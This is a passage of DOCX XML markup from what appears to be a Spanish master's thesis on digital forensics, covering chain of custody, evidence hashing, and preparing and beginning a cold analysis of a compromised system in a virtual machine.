          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de que</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no se han producido errores en la copia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA920C0" w14:textId="5F82E9E3" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La cadena de custodia</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Cadena de custodia: Proceso documentado que rastrea la manipulación de evidencia, como datos digitales, desde su recolección hasta su presentación en un tribunal."</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 xml:space="preserve"> es el procedimiento controlado aplicable a las evidencias relacionadas con el suceso, desde el momento en que se encuentran en la escena hasta su análisis en el laboratorio. La finalidad de la cadena de custodia es evitar cualquier tipo de manipulación y tener un control absoluto sobre todos los elementos incautados, quién los ha manipulado, cómo lo ha realizado, porqué los ha manipulado, para qué lo ha hecho y cuándo ha tenido lugar dicha manipulación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E5260" w14:textId="6412AA47" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En nuestro caso, cabe destacar </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> una vez iniciado el análisis de </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">la memoria, esta no debe de modificarse ni contaminarse, en caso de ello el </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash de las evidencias cambiaría, por lo que la evidencia ha quedado contaminada. Hay que hacer estas acciones teniendo presente al secretario judicial, para que esa copia quede registrada si es necesario y que no ha habido </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> alteraciones al respecto, ese cambio de hash</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Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>será notificado y adjuntado en el proceso de instrucción, haciéndose también nuevas copias de este nuevo "snapshot" de la prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A2ADD" w14:textId="33D83188" w:rsidR="006F21A3" w:rsidRPr="00C86658" w:rsidRDefault="00062086" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86658">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis</w:t>
      </w:r>
      <w:r w:rsidR="006F21A3" w:rsidRPr="00C86658">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD37734" w14:textId="37F30E55" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La fase de análisis, </w:t>
      </w:r>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en la cual iniciamos la elaboración del presente TFM</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, no termina hasta que no se puede determinar qué o quién causó el incidente, cómo lo hizo, qué afectación ha tenido en el sistema, etc. Es decir, es el núcleo duro de la investigación y tiene que concluir con el máximo de información posible para poder </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>elaborar</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unos informes con todo el suceso bien documentado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63402D7C" w14:textId="18E9ED79" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Antes de empezar el análisis, es importante recordar unas premisas básicas que todo investigador debe tener presente en el momento de enfrontarse al incidente. Como ya se ha explicado nunca se debe trabajar con datos originales y se debe respetar cada una de las leyes vigentes en la jurisdicción donde se lleve a cabo la investigación. Los resultados que se obtengan de todo el proceso han de ser verificables y reproducibles, Es importante también disponer de una documentación adicional con información de diversa índole, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566F4A7" w14:textId="690F83C2" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>operativo del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C45F7E" w14:textId="38F893E9" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Programas instalados en el equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9040C9" w14:textId="1CEA6FF0" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hardware, accesorios y periféricos que forman parte del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02123AF6" w14:textId="02B0CBA9" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datos relativos a la conectividad del equipo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C9DFA" w14:textId="5BE82A97" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Si dispone de firewall</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Firewall: Dispositivo de seguridad de red que monitorea y controla el tráfico de red entrante y saliente basado en un conjunto de reglas de seguridad."</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 ya sea físico o lógico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5328D" w14:textId="16C4D786" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Si el equipo se encuentra en zonas de red especiales, por ejemplo, DMZ</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DMZ (Demilitarized Zone): Subred que actúa como una capa adicional de seguridad en una red, separando la red interna de la red pública."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A11494" w14:textId="2DA8ED1D" w:rsidR="006F21A3" w:rsidRPr="009440E4" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Si tiene conexión a Internet o utiliza proxies</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Proxies: Plural de Proxy"</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F44F1" w14:textId="05043606" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datos generales de configuración que puedan ser de interés para el investigador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5524767D" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>para ayudar en la tarea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793EB94" w14:textId="2B13708B" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cabe recordar que no existe ningún proceso estándar</w:t>
      </w:r>
      <w:r w:rsidR="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00494389" w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cada investigación es única y debe ser tratada individualmente. Las diferencias pueden incluir el sistema operativo del equipo (Windows o Linux), el tipo de incidente (como intrusión en correo electrónico o ataque de denegación de servicio), y la naturaleza del malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4468D666" w14:textId="23D13D4B" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En todo caso, se pueden destacar varios pasos, que habrá que adaptar en cada caso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5DD90" w14:textId="731B9E20" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preparar un entorno de trabajo adaptado a las necesidades del incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674198A7" w14:textId="3E48D883" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reconstruir una línea temporal con los hechos sucedidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A3979" w14:textId="1E7B7D7D" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Determinar qué procedimiento se llevó a cabo por parte del atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBCC00" w14:textId="6D00DBCA" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identificar el autor o autores de los hechos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DC4D6" w14:textId="71710F8B" w:rsidR="006F21A3" w:rsidRPr="00494389" w:rsidRDefault="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494389">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Evaluar el impacto causado y si es posible la recuperación del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0C931" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Antes de empezar el análisis propiamente, se debe preparar un entorno para dicho análisis. Es el momento de decidir si se va a hacer un análisis en caliente o en frío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167030C7" w14:textId="4862D202" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En caso de un análisis en caliente se hará la investigación sobre los discos originales, lo que conlleva ciertos riesgos. Hay que tomar la precaución de poner el disco en modo sólo lectura, esta opción sólo está disponible en sistemas operativos </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero no en Windows. Si se opta por esta opción hay que operar con sumo cuidado pues cualquier error puede ser fatal y dar al traste con todo el proceso, invalidando las pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B746195" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Si se opta por un análisis en frío, lo más sencillo es preparar una máquina virtual (en adelante VM) con el mismo sistema operativo del equipo afectado y montar una imagen del disco. Para ello, previamente habremos creado la imagen a partir de las copias que se hicieron para el análisis. En este caso podremos trabajar con la imagen, ejecutar archivos y realizar otras tareas sin tanto cuidado, pues siempre cabe la opción de volver a montar la imagen desde cero en caso de problemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64525616" w14:textId="0C1E4AFD" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La opción del análisis en frío, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA75A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La cual será el caso que nos atañe el presente TFM, ya que de este modo es como se realizará el análisis</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, resulta muy atractiva pues en caso de malwares se podrán ejecutar sin miedo, reproducir lo que ocurre y desmontar la imagen sin que la copia original resulte afectada. De este modo tal vez se pueda ir un poco más allá en la investigación y ser</w:t>
      </w:r>
      <w:r w:rsidR="00B5632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>un poco más agresivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A441D70" w14:textId="340D7282" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Existen varios programas gratuitos para crear y gestionar </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VM’s,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo,</w:t>
      </w:r>
      <w:r w:rsidR="00B5632C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Oracle VM VirtualBox, que ofrecen muy buenas prestaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B89FFB5" w14:textId="09170D7E" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para empezar, lo mejor es determinar la fecha de instalación del sistema operativo, para ello se puede buscar en los datos de registro. </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Además,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la mayoría de </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>los ficheros</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del sistema compartirán esa fecha. A partir de aquí puede ser interesante ver qué usuarios se crearon al principio, para ver si hay discrepancias o usuarios fuera de lo común en últimos instantes del equipo. Para ver esta información también es útil acudir al registro del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B40A4" w14:textId="586A15A5" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Teniendo ya los datos iniciales del sistema, ahora se puede </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buscar</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> más información en los ficheros que se ven "a simple vista". Lo importante es localizar que programas fueron los últimos en ser instalados y qué cambios repercutieron en el sistema. Lo más habitual es que estos programas no se instalen en los lugares habituales, sino que se localicen en rutas poco habituales, por </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ejemplo,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en archivos temporales o mezclados con los archivos y librerías del sistema operativo. Aquí se puede ir creando la línea temporal con esos datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB90AE" w14:textId="1211B2F1" w:rsidR="006F21A3" w:rsidRPr="006F21A3" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El siguiente paso del análisis es determinar el </w:t>
      </w:r>
